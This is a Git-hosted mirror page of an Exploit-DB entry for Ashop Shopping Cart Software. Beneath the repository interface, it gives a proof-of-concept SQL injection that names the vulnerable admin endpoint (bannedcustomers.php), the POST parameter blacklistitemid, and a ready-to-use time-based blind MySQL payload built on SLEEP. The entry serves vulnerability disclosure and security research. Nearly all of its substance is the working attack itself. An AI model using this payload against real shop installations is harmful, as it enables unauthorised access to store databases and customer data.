bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46681.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

18 lines
No EOL
638 B
Text
Raw Blame History

# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 08.04.2019
# Exploit Author: Doğukan Karaciğer
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Lastest
# Tested on: Ubuntu-trusty-64
# CVE: N/A
----- PoC: SQLi -----
Request: http://localhost/[PATH]/admin/bannedcustomers.php
Parameter: blacklistitemid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blacklistitem=1&deletebutton=Delete&blacklistitemid=1 AND (SELECT
* FROM (SELECT(SLEEP(5)))MGvE)
Reference in a new issue View git blame Copy permalink